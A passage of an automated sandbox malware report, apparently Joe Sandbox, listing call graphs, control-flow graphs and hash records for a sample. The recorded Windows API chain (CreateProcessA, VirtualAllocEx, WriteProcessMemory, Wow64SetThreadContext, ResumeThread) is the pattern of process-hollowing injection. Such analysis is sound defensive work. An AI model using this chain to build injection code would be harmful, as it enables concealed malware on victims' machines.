ResumeThread 8651->8654 8652 23df9b 8652->8577 8653->8652 8654->8652 8656 23de49 8655->8656 8658 23c260 ReadProcessMemory 8656->8658 8659 23c259 ReadProcessMemory 8656->8659 8657 23e732 8658->8657 8659->8657 8661 23de5a 8660->8661 8663 23c260 ReadProcessMemory 8661->8663 8664 23c259 ReadProcessMemory 8661->8664 8662 23e732 8663->8662 8664->8662 8666 23e29d 8665->8666 8671 23ba70 Wow64SetThreadContext 8666->8671 8672 23ba68 Wow64SetThreadContext 8666->8672 8667 23de9e 8668 23df9b 8667->8668 8669 23b980 ResumeThread 8667->8669 8670 23b979 ResumeThread 8667->8670 8668->8577 8668->8668 8669->8668 8670->8668 8671->8667 8672->8667 8674 23ddc2 8673->8674 8718 23c498 8674->8718 8722 23c48d 8674->8722 8679 23c14c WriteProcessMemory 8678->8679 8681 23c1eb 8679->8681 8681->8602 8683 23c14c WriteProcessMemory 8682->8683 8685 23c1eb 8683->8685 8685->8602 8687 23c01c VirtualAllocEx 8686->8687 8689 23c09a 8687->8689 8689->8606 8691 23bfd8 VirtualAllocEx 8690->8691 8693 23c09a 8691->8693 8693->8606 8695 23c2ac ReadProcessMemory 8694->8695 8697 23c32a 8695->8697 8697->8611 8699 23c2ac ReadProcessMemory 8698->8699 8701 23c32a 8699->8701 8701->8611 8703 23b9c4 ResumeThread 8702->8703 8705 23ba16 8703->8705 8705->8616 8707 23b9c4 ResumeThread 8706->8707 8709 23ba16 8707->8709 8709->8616 8711 23bab9 Wow64SetThreadContext 8710->8711 8713 23bb37 8711->8713 8713->8634 8715 23bab9 Wow64SetThreadContext 8714->8715 8717 23bb37 8715->8717 8717->8634 8719 23c51f 8718->8719 8719->8719 8720 23c70a CreateProcessA 8719->8720 8721 23c77d 8720->8721 8723 23c51f 8722->8723 8723->8723 8724 23c70a CreateProcessA 8723->8724 8725 23c77d 8724->8725
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Ppp
                                                • API String ID: 0-99483665
                                                • Opcode ID: 1835a9b7aefae1ff65b555128fb04f0bec671a57332e71dc7fff12d98059a691
                                                • Instruction ID: 5ffcb62b75c207c7c1067fc6946b78b127e02ea1e288e549a4be818f952aa30c
                                                • Opcode Fuzzy Hash: 1835a9b7aefae1ff65b555128fb04f0bec671a57332e71dc7fff12d98059a691
                                                • Instruction Fuzzy Hash: E9E2E774A11719CFCB24EF64C898A99B3B1FF89300F1186E9E5096B361DB71AE85CF50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Ppp
                                                • API String ID: 0-99483665
                                                • Opcode ID: 8126da246dca6a7a9879f02f5398bf8db5ec98d78e605d731a39c4fa97c067ce
                                                • Instruction ID: 5ac3fe616d7c46383e5f2ae602fece50bde0d6714a5099831315fa6615500275
                                                • Opcode Fuzzy Hash: 8126da246dca6a7a9879f02f5398bf8db5ec98d78e605d731a39c4fa97c067ce
                                                • Instruction Fuzzy Hash: E5E2F874A11719CFC714EF64C898A99B7B1FF8A300F1186E9E5096B361DB31AE85CF50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f7f6bdf0edcea964b1fc06d2f5587de9660353cca54adf2f630ec9932948c42
                                                • Instruction ID: 4b6bc280274924b11a2c262009efd2544688c69a3860a0c667c8a8b00a67493d
                                                • Opcode Fuzzy Hash: 1f7f6bdf0edcea964b1fc06d2f5587de9660353cca54adf2f630ec9932948c42
                                                • Instruction Fuzzy Hash: D97106B0D28618CBDB14CFA6C8406EDBBB6BF89300F20E46AD419BB255DB744B56DF50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac74b3fb57d723fac90b32ac680c87ce12b982ecd4c6c7ccb129e95bcdb920bf
                                                • Instruction ID: fcd63c6d3b42cf0045e1f2ae2e4bea861b2687efd1e4516000ecc796008250d1
                                                • Opcode Fuzzy Hash: ac74b3fb57d723fac90b32ac680c87ce12b982ecd4c6c7ccb129e95bcdb920bf
                                                • Instruction Fuzzy Hash: F9210AB0D186588BEB19CFA7C8543EEFFB6AFC9300F14C16AC40966264DB740946CF50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c30a35c52dbaaae39c4d6fa8905d7c8e3955f37df610ee500ac027086e6f71eb
                                                • Instruction ID: 2f6a13ec7e3926a79eb4f39c860e8e7cd1de95272357fbfe18288ce43620304d
                                                • Opcode Fuzzy Hash: c30a35c52dbaaae39c4d6fa8905d7c8e3955f37df610ee500ac027086e6f71eb
                                                • Instruction Fuzzy Hash: 8921B4B0D146588BEB18CFABC9547EEFAF6AFC8300F14C06AD40966264DBB409468F90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 23c48d-23c531 2 23c533-23c54a 0->2 3 23c57a-23c5a2 0->3 2->3 8 23c54c-23c551 2->8 6 23c5a4-23c5b8 3->6 7 23c5e8-23c63e 3->7 6->7 18 23c5ba-23c5bf 6->18 16 23c640-23c654 7->16 17 23c684-23c77b CreateProcessA 7->17 9 23c553-23c55d 8->9 10 23c574-23c577 8->10 13 23c561-23c570 9->13 14 23c55f 9->14 10->3 13->13 15 23c572 13->15 14->13 15->10 16->17 25 23c656-23c65b 16->25 36 23c784-23c869 17->36 37 23c77d-23c783 17->37 19 23c5e2-23c5e5 18->19 20 23c5c1-23c5cb 18->20 19->7 22 23c5cf-23c5de 20->22 23 23c5cd 20->23 22->22 26 23c5e0 22->26 23->22 27 23c67e-23c681 25->27 28 23c65d-23c667 25->28 26->19 27->17 30 23c66b-23c67a 28->30 31 23c669 28->31 30->30 33 23c67c 30->33 31->30 33->27 49 23c86b-23c86f 36->49 50 23c879-23c87d 36->50 37->36 49->50 53 23c871 49->53 51 23c87f-23c883 50->51 52 23c88d-23c891 50->52 51->52 54 23c885 51->54 55 23c893-23c897 52->55 56 23c8a1-23c8a5 52->56 53->50 54->52 55->56 57 23c899 55->57 58 23c8a7-23c8d0 56->58 59 23c8db-23c8e6 56->59 57->56 58->59 62 23c8e7 59->62 62->62
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0023C75F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: +Hp$+Hp
                                                • API String ID: 963392458-59550660
                                                • Opcode ID: 1295ed60faea34e07b1236ed626ca8d8d501b80b0a46c83043343892d9435825
                                                • Instruction ID: 0ee8a3ce55e34bee0a726b38390d6bbac150d63788b379a971a0e8a4b9ce1163
                                                • Opcode Fuzzy Hash: 1295ed60faea34e07b1236ed626ca8d8d501b80b0a46c83043343892d9435825
                                                • Instruction Fuzzy Hash: F6C148B1D0021A8FDF25DFA8C841BEDBBB1BF49304F1091AAD819B7250DB749A95CF94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 64 23c498-23c531 66 23c533-23c54a 64->66 67 23c57a-23c5a2 64->67 66->67 72 23c54c-23c551 66->72 70 23c5a4-23c5b8 67->70 71 23c5e8-23c63e 67->71 70->71 82 23c5ba-23c5bf 70->82 80 23c640-23c654 71->80 81 23c684-23c77b CreateProcessA 71->81 73 23c553-23c55d 72->73 74 23c574-23c577 72->74 77 23c561-23c570 73->77 78 23c55f 73->78 74->67 77->77 79 23c572 77->79 78->77 79->74 80->81 89 23c656-23c65b 80->89 100 23c784-23c869 81->100 101 23c77d-23c783 81->101 83 23c5e2-23c5e5 82->83 84 23c5c1-23c5cb 82->84 83->71 86 23c5cf-23c5de 84->86 87 23c5cd 84->87 86->86 90 23c5e0 86->90 87->86 91 23c67e-23c681 89->91 92 23c65d-23c667 89->92 90->83 91->81 94 23c66b-23c67a 92->94 95 23c669 92->95 94->94 97 23c67c 94->97 95->94 97->91 113 23c86b-23c86f 100->113 114 23c879-23c87d 100->114 101->100 113->114 117 23c871 113->117 115 23c87f-23c883 114->115 116 23c88d-23c891 114->116 115->116 118 23c885 115->118 119 23c893-23c897 116->119 120 23c8a1-23c8a5 116->120 117->114 118->116 119->120 121 23c899 119->121 122 23c8a7-23c8d0 120->122 123 23c8db-23c8e6 120->123 121->120 122->123 126 23c8e7 123->126 126->126
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0023C75F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: +Hp$+Hp
                                                • API String ID: 963392458-59550660
                                                • Opcode ID: 4fc2929cbd092bcb3d3c6ca37d204f96a3f59bcb862bcc60ec9e46baf282d15a
                                                • Instruction ID: b3e6c2b458fb50815dbe5e46c5d19e7044bb7d3e0dcc227a24af7e30d8ae530f
                                                • Opcode Fuzzy Hash: 4fc2929cbd092bcb3d3c6ca37d204f96a3f59bcb862bcc60ec9e46baf282d15a
                                                • Instruction Fuzzy Hash: 3BC138B1D0021A8FDF25DFA8C841BEDBBB1BF49304F1091AAD819B7250DB749A95CF94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 174 23c0f8-23c16b 176 23c182-23c1e9 WriteProcessMemory 174->176 177 23c16d-23c17f 174->177 179 23c1f2-23c244 176->179 180 23c1eb-23c1f1 176->180 177->176 180->179
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0023C1D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID: +Hp
                                                • API String ID: 3559483778-2518647782
                                                • Opcode ID: fa309232f48193a940972c5894e48a784d92899de136b7a5ca1017d7bbb39eff
                                                • Instruction ID: d9d38d6e3aca057d526b59372d2112ce8106c9e57031768dffafd1593b38622b
                                                • Opcode Fuzzy Hash: fa309232f48193a940972c5894e48a784d92899de136b7a5ca1017d7bbb39eff
                                                • Instruction Fuzzy Hash: BC41BBB4D012489FCF00CFA9D984AEEFBF1BB49314F20942AE818B7250D374AA55CF64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 185 23c100-23c16b 187 23c182-23c1e9 WriteProcessMemory 185->187 188 23c16d-23c17f 185->188 190 23c1f2-23c244 187->190 191 23c1eb-23c1f1 187->191 188->187 191->190
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0023C1D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID: +Hp
                                                • API String ID: 3559483778-2518647782
                                                • Opcode ID: a14646f666e99cd7077d0fbeee04271b9237171a1e386ab7ae070e3c2ce2e1f4
                                                • Instruction ID: c6a43186fb8c392835c8b0fee302fabdd280805b84489893fa4497baa8fd3596
                                                • Opcode Fuzzy Hash: a14646f666e99cd7077d0fbeee04271b9237171a1e386ab7ae070e3c2ce2e1f4
                                                • Instruction Fuzzy Hash: 4D41ABB4D002589FCF00CFA9D984AEEFBF1BB49314F20942AE818B7250D774AA55CF64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 196 23c259-23c328 ReadProcessMemory 199 23c331-23c383 196->199 200 23c32a-23c330 196->200 200->199
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0023C312
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID: +Hp
                                                • API String ID: 1726664587-2518647782
                                                • Opcode ID: e31d0f0691b8a81423276264f83dbdbb15c30a3fbb10f64601384b38f9497786
                                                • Instruction ID: 407f16bb5dee591b77fc0db67ff23c0a8d35888f3c0131c114e1e19e7f3c15d9
                                                • Opcode Fuzzy Hash: e31d0f0691b8a81423276264f83dbdbb15c30a3fbb10f64601384b38f9497786
                                                • Instruction Fuzzy Hash: 1341BCB5D002589FCF10CFAAD884AEEFBB1BF49314F20942AE815B7244D375A955CF64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 205 23c260-23c328 ReadProcessMemory 208 23c331-23c383 205->208 209 23c32a-23c330 205->209 209->208
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0023C312
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID: +Hp
                                                • API String ID: 1726664587-2518647782
                                                • Opcode ID: b5dc648f98cc39ed1489d8609453f6621172d074a9d9844cc47e2d0135c94202
                                                • Instruction ID: 4ce71e68c9130b2e0a9c43c4a720f586e0354d4155b5db0b37752df4bd6e847f
                                                • Opcode Fuzzy Hash: b5dc648f98cc39ed1489d8609453f6621172d074a9d9844cc47e2d0135c94202
                                                • Instruction Fuzzy Hash: 6D41B9B4D002589FCF10CFAAD884AEEFBB1BF49310F20942AE814B7204C775A955CF68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 214 23bfd0-23c098 VirtualAllocEx 218 23c0a1-23c0eb 214->218 219 23c09a-23c0a0 214->219 219->218
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0023C082
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: +Hp
                                                • API String ID: 4275171209-2518647782
                                                • Opcode ID: e23be9b28b351a68f76bf8cb25e1d83b506e96f7f6c579118f1fdccb21b4d141
                                                • Instruction ID: 35473761700a3555627b8a70f96e58405f0f5b556083d2a17cc8ae568c6f9fb4
                                                • Opcode Fuzzy Hash: e23be9b28b351a68f76bf8cb25e1d83b506e96f7f6c579118f1fdccb21b4d141
                                                • Instruction Fuzzy Hash: D141A8B9D00248DBCF10CFA9D984AAEFBB1AB49314F20942AE814B7310D775A955CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 224 23bfd8-23c098 VirtualAllocEx 227 23c0a1-23c0eb 224->227 228 23c09a-23c0a0 224->228 228->227
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0023C082
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: +Hp
                                                • API String ID: 4275171209-2518647782
                                                • Opcode ID: cd6bdc5586cfc55ec27059535dc92cd5597076175d86608f3dea0dc8d741fed6
                                                • Instruction ID: 5bfcb63a5a2d34ef622aff95d28c10f674f4e50297b4422a3d75eb2d2b796709
                                                • Opcode Fuzzy Hash: cd6bdc5586cfc55ec27059535dc92cd5597076175d86608f3dea0dc8d741fed6
                                                • Instruction Fuzzy Hash: 5F41A7B8D00248DFCF10CFA9D984AAEFBB1BB49314F20942AE814B7210D775A955CFA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 233 23ba68-23bad0 235 23bad2-23bae4 233->235 236 23bae7-23bb35 Wow64SetThreadContext 233->236 235->236 238 23bb37-23bb3d 236->238 239 23bb3e-23bb8a 236->239 238->239
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0023BB1F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID: +Hp
                                                • API String ID: 983334009-2518647782
                                                • Opcode ID: fb04077242e48e241f84a9ff8f8d66d1d4ce407c3eabb400c06d57ca4294caac
                                                • Instruction ID: 2a68dab91f2df90ea5a5b6789a146fd016b885c6c192707afcbd8a8a7aa0cf04
                                                • Opcode Fuzzy Hash: fb04077242e48e241f84a9ff8f8d66d1d4ce407c3eabb400c06d57ca4294caac
                                                • Instruction Fuzzy Hash: FF41BCB4D102589FCF10CFA9D984AEEFBB1BF49314F24842AE815B7244D778A949CF54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 244 23ba70-23bad0 246 23bad2-23bae4 244->246 247 23bae7-23bb35 Wow64SetThreadContext 244->247 246->247 249 23bb37-23bb3d 247->249 250 23bb3e-23bb8a 247->250 249->250
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 0023BB1F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID: +Hp
                                                • API String ID: 983334009-2518647782
                                                • Opcode ID: b9436692441dd05bdf03e41aa1085c871776e67299f16fb41d63ad681819f4a9
                                                • Instruction ID: a90d4229064667d2e07acf4e68b42f67ee7f89e941545455e556e32b67fce787
                                                • Opcode Fuzzy Hash: b9436692441dd05bdf03e41aa1085c871776e67299f16fb41d63ad681819f4a9
                                                • Instruction Fuzzy Hash: 8F41ACB4D102589FCF10CFAAD984AEEFBB1BF49314F24842AE815B7244D778A945CF54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 255 23b979-23ba14 ResumeThread 258 23ba16-23ba1c 255->258 259 23ba1d-23ba5f 255->259 258->259
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0023B9FE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID: +Hp
                                                • API String ID: 947044025-2518647782
                                                • Opcode ID: 4ab51cc7275bd6f4cbc75c5072fd2570d6940cf39e8d3000067a9d22d45962c9
                                                • Instruction ID: 52ec7b9926237f70f9f76ce027d50c8ac4e45b0262d523913ec67cbf2554ccd9
                                                • Opcode Fuzzy Hash: 4ab51cc7275bd6f4cbc75c5072fd2570d6940cf39e8d3000067a9d22d45962c9
                                                • Instruction Fuzzy Hash: FE31CAB4D012189FCF10CFA9E884AAEFBB1AF49314F24942AE815B7300C775A905CF94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 264 23b980-23ba14 ResumeThread 267 23ba16-23ba1c 264->267 268 23ba1d-23ba5f 264->268 267->268
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0023B9FE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID: +Hp
                                                • API String ID: 947044025-2518647782
                                                • Opcode ID: 168aac497c8c9cc4349ee1d8b34cd3df10cb485b8a2713866a2e551411df14f8
                                                • Instruction ID: 756f6957e424af2ccdeadc1d49c4921867061b3c3a3f8a0f915451271a6b059f
                                                • Opcode Fuzzy Hash: 168aac497c8c9cc4349ee1d8b34cd3df10cb485b8a2713866a2e551411df14f8
                                                • Instruction Fuzzy Hash: E031BCB4D102189FCF10CFAAD984AAEFBB5AF49314F24942AE815B7300C775A905CF94
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.405822821.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1ed000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05c1bc9447aaa21631921dedc45a8b3e72222d84670ea03ee7af91dfd1bec4c4
                                                • Instruction ID: 684f081338ae86a0e274c9b128e50c2152d2c6e7b30b763f7acd8c474fdbc14d
                                                • Opcode Fuzzy Hash: 05c1bc9447aaa21631921dedc45a8b3e72222d84670ea03ee7af91dfd1bec4c4
                                                • Instruction Fuzzy Hash: 6D21B075604680EFDB15CF15E884B2ABB65EB84314F38C5A9E84A4B246C736D847CBA1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.405822821.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1ed000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1374012aac455eb8d0d0b195f3eb2990cf018af8630874b01d7c2d38a8d56665
                                                • Instruction ID: f46db9577fce4f48d35e4541de9753d00afe003c6e87eb73f4e068d98263b60f
                                                • Opcode Fuzzy Hash: 1374012aac455eb8d0d0b195f3eb2990cf018af8630874b01d7c2d38a8d56665
                                                • Instruction Fuzzy Hash: B5218B755097C08FDB02CF24D994B15BF71EB46314F28C5EAD8498F6A7C33A984ACB62
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1964ecfb3583ff44eab4d0b681e76759fc4070bd725154341f0bfdaca1577679
                                                • Instruction ID: 1fd8c93cc467597e5a1334310bfedfacb0221eb1d00d394671906127d97f7361
                                                • Opcode Fuzzy Hash: 1964ecfb3583ff44eab4d0b681e76759fc4070bd725154341f0bfdaca1577679
                                                • Instruction Fuzzy Hash: 0DE13CB4E102698FDB14DFA9C590AAEFBB2FF89300F248169D915AB356C7319D41CF60
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: caa1840b857a3a876740bcef7d3d38bc9bf2d30b24c03bb772afd89cf864707e
                                                • Instruction ID: 6c9034a502a938333543db6f2168a74a5fe8eedfd5051cf0216df3c119c32f3f
                                                • Opcode Fuzzy Hash: caa1840b857a3a876740bcef7d3d38bc9bf2d30b24c03bb772afd89cf864707e
                                                • Instruction Fuzzy Hash: 57E13AB4E102598FDB14DFA8C580AADFBB6FF88300F248169D855AB356D731AD42CF61
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7800b3b6c4a5ab2eb2cabccabf08b668d102bb7c057755f2a4708929cbd22825
                                                • Instruction ID: 732ee7526680106758e1938469550b21d05690c39a0493b1a149981e911e7839
                                                • Opcode Fuzzy Hash: 7800b3b6c4a5ab2eb2cabccabf08b668d102bb7c057755f2a4708929cbd22825
                                                • Instruction Fuzzy Hash: 10E12BB4E101598FDB14DFA8C580AADFBB2FF88304F248169D855AB356C731AD42CFA1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0c9238c7c3a62ae26def78a97b95035fffb525c639b0a3dd0b47e2959c0dbff3
                                                • Instruction ID: 710c3a7184454bac94671351b063ee56e0232aa6a15ac3ed7586687493b9fed3
                                                • Opcode Fuzzy Hash: 0c9238c7c3a62ae26def78a97b95035fffb525c639b0a3dd0b47e2959c0dbff3
                                                • Instruction Fuzzy Hash: 0DE10BB4E101598FDB14DFA9C580AADFBF2BF89300F248569E915AB356CB319D42CF60
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b90d3e0c1be2e9a485329533730b3d3aa81c5150bcf3a9cf922b58e192762974
                                                • Instruction ID: 00dd26b6271d5f069c148e10a22e48dbd9ca655993d74f6efece3e5bfe852091
                                                • Opcode Fuzzy Hash: b90d3e0c1be2e9a485329533730b3d3aa81c5150bcf3a9cf922b58e192762974
                                                • Instruction Fuzzy Hash: 97E12BB4E102598FDB14DFA9C580AADFBB2FF89300F248169D855AB356C7319D42CFA1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eddb4d88007f72f7eae6b7701bfae8f2a89ae6d93b495a8e40c1ded6b0c84e87
                                                • Instruction ID: 9f2e14cc0d6b274c38ec69a3c7830e22da799ca4d0fa9474a126e740cc623bb9
                                                • Opcode Fuzzy Hash: eddb4d88007f72f7eae6b7701bfae8f2a89ae6d93b495a8e40c1ded6b0c84e87
                                                • Instruction Fuzzy Hash: 45512D74E142598FDB14CFA9C5805AEFBF2BF89300F24816AD458AB356C7319942CFA1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.406041982.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_230000_hgqilegacy20306.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98819f2710137ad745d3b72e64e04f0857a014cbc8baa92cc33074b5694fbf9e
                                                • Instruction ID: 8ea01a92c6e77e1be5ae4f2f33fba62023a4c0ab152dc73d79661d75a6109004
